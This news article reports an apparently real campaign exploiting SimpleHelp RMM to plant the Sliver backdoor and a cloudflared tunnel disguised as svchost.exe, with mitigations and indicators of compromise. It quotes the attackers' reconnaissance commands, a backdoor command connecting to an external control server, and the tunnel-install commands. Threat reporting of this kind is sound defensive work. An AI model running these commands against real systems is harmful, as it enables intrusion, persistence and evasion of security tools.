Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems

Hackers have been exploiting vulnerabilities in the SimpleHelp remote management and monitoring (RMM) tool to deploy malware, including the Sliver backdoor, on compromised systems. This attack highlights the importance of keeping software up to date and implementing robust security measures to prevent such exploits. The attack begins with the threat actor connecting to the endpoint […] The post Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems appeared first on Cyber Security News.

Feb 7, 2025 - 13:31
 0
Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems

Hackers have been exploiting vulnerabilities in the SimpleHelp remote management and monitoring (RMM) tool to deploy malware, including the Sliver backdoor, on compromised systems.

This attack highlights the importance of keeping software up to date and implementing robust security measures to prevent such exploits.

The attack begins with the threat actor connecting to the endpoint via the vulnerable SimpleHelp RMM client, known as JWrapper-Remote Access.

In one instance, the connection was made from the IP address 194.76.227[.]171, which is based in Estonia and hosts a SimpleHelp Server on port 80.

Data associated with IP 194.76.227[.]171 (Source – Field Effect)

Researchers at Field Effect discovered that once it connected, the threat actor executes a series of discovery commands to gather system details, user accounts, and network information.

These commands include:-

  • ipconfig /all
  • sc query
  • schtasks
  • driverquery
  • nltest /dclist:
  • nltest /domain_trusts
  • net share
  • net use
  • tasklist
  • findstr CSFalcon
  • quser
  • net group "domain admins" /domain
  • hostname
  • ping

The attackers deploy the Sliver backdoor, a post-exploitation tool written in Go, which provides capabilities for process injection, service tampering, command execution, and file system manipulation. The backdoor is configured to connect to the IP address 45.9.148[.]136 on port 443 using the command:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert
Data associated with IP 45.9.148[.]136 (Source – Field Effect)

Lateral Movement and Additional Payloads

In addition to deploying the Sliver backdoor, the attackers also installed a cloudflared tunnel, masquerading it as the legitimate Windows svchost.exe, to establish a secure, encrypted connection for further malicious activities. This was done using the command:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

Followed by:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)
Data associated with IP 45.9.149[.]112 (Source – Field Effect)

Organizations using SimpleHelp RMM can protect against these attacks by keeping SimpleHelp and all remote access tools updated.

Not only that even one can restrict the remote access to trusted IP ranges with multi-factor authentication, monitor network traffic and logs for malicious connections, and regularly reviewing administrative accounts for unauthorized additions.

By taking these steps, organizations can significantly reduce their vulnerability to such attacks and protect their systems from malicious exploitation.

Indicators of Compromise (IoCs)

  • IP addresses: 194.76.227[.]171, 45.9.148[.]136, 45.9.149[.]112
  • Hashes: 385a826b9f7e72b870a92f1901d9d354 (MD5), EC43ED845102760265ED6343EF1FCEF696588905 (SHA1), 15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49 (SHA256)
  • JA3 Hash: d6828e30ab66774a91a96ae93be4ae4c

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

The post Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems appeared first on Cyber Security News.